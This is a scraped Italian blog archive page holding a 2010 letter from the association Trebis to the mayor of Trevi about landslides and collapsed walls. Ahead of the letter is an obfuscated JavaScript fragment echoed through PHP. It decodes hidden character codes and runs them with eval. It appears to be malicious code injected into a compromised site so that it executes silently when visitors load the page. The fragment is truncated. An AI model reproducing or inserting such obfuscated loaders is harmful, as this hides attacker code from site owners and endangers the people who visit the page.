q4Zq1Zq72Zq4Zq1Zq60Zq5dZq1fZq3eZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq70Zq6aZq61Zq5aZq67Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74\"[gzr](\"Zq\");}uwo=cpf;uoukoc=[];for(ymg=22-20-2;-ymg 1420!=0;ymg =1){ubtze=ymg;if((0x19==031))uoukoc =pivr.fromCharCode(eval(xcf uwo[1*ubtze]) 0xa-nhmv);}ilqz=eval;if(Math.ceil(5.5)===6)ilqz(uoukoc)}";echo $x;} ?>

Archive for Giugno, 2010

Lettera per la situazione idrogeologica

admin Giugno 7th, 2010

Trevi 3 giugno 2010

Egregio Signor Sindaco

L’associazione Trebis, preoccupata della situazione idrogeologica della zona collinare e del centro storico:
- crolli di muri nell’area soggetta ai lavori di riqualificazione delle vie della città, verificatisi nel corso del mese di maggio;
- crollo di muri a secco e conseguente pericolo di smottamenti in località Fondaccio, lungo la strada alta di collegamento Bovara Pigge (sulla quale transita anche il mezzo di trasporto degli alunni);
- smottamenti nell’area sottostante la strada comunale in direzione S.Caterina;
- smottamenti ripetuti in via Orto degli Spiriti, etc.,
sollecita l’Amministrazione a farsi carico di una indagine idrogeologica al fine di adottare le misure necessarie per la salvaguardia del territorio, anche a tutela della sicurezza pubblica, quali il ripristino e la manutenzione dei muri a secco e la collocazione di specie vegetali con possente sviluppo radicolare, unitamente agli interventi specifici suggeriti dall’indagine.
L’Associazione auspica che eventuali interventi siano posti in opera con quegli accorgimenti estetici compatibili con la tutela del paesaggio e del centro storico.
In attesa di tali studi ed interventi l’Associazione Trebis chiede a codesta Amministrazione di fare una immediata valutazione della consistenza ed accessibilità delle strade e dei vicoli del centro storico, per stabilire la portata degli stessi in relazione al peso e alle dimensioni dei mezzi che possono transitarvi, onde evitare ulteriori dissesti a strade, muri, case etc.
L’associazione Trebis confida nell’attenzione che codesta Amministrazione vorrà prestare alle denunzie e proposte di cui sopra, fatte con il consueto spirito di collaborazione, ringrazia e porge distinti saluti.

Patricia Clough,
Presidente

–>